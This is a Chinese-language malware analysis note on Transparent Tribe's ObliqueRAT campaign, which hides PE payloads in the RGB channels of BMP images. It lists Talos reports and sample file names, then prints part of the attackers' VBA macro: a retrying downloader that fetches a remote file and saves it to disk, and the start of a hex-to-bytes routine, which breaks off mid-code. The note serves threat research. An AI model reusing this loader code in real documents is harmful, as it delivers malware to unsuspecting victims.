透明部落通过BMP的RGB通道隐藏PE数据
-
- 报告和样本
-
- [《Transparent Tribe APT expands its Windows malware arsenal》](https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html)
- [《ObliqueRAT returns with new campaign using hijacked websites》](https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html)
- [《ObliqueRAT: New RAT hits victims' endpoints via malicious documents》](https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html)
- 样本
- 知识扩展图片隐写
报告和样本
《Transparent Tribe APT expands its Windows malware arsenal》
没什么技术分析,主要是描述战术和趋势
《ObliqueRAT returns with new campaign using hijacked websites》
有描述宏代码,以及RAT的更新
《ObliqueRAT: New RAT hits victims’ endpoints via malicious documents》
内容为ObliqueRAT分析,也可以看看
样本
theta.bmp
camela.bmp
merj.bmp
宏代码
DownloadBackground:下载图片
BackgroundStretch:读取BMP图片保存为xls
BackgroundSize:将字符串Letter(ASC)转为OrderByte(Byte)
'下载图片
Sub DownloadBackground(url As String, filePath As String)
Dim WinHttpReq As Object, attempts As Integer
attempts = 4
On Error GoTo TryAgain
TryAgain:
attempts = attempts - 1
Err.Clear
If attempts > 0 Then
Set WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")
WinHttpReq.Open \"GET\", url, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
Set Themeream = CreateObject(\"ADODB.Stream\")
Themeream.Open
Themeream.Type = 1
Themeream.Write WinHttpReq.responseBody
Themeream.SaveToFile filePath, 1
Themeream.Close
End If
End If
End Sub
'PE文件大小
Private Function BackgroundSize(ByVal ProtectString As String) As Byte()
Dim Nibbles() As Byte
Dim ProtectPos As Long
Dim ProtectDigit As Long
Dim CursorLen As Long
Dim Numeris As Long
ReDim Nibbles(Len(ProtectString) \\ 2)
For ProtectPos = 1 To Len(ProtectString)
ProtectDigit = InStr(\"0123456789ABCDEF\", _
UCase$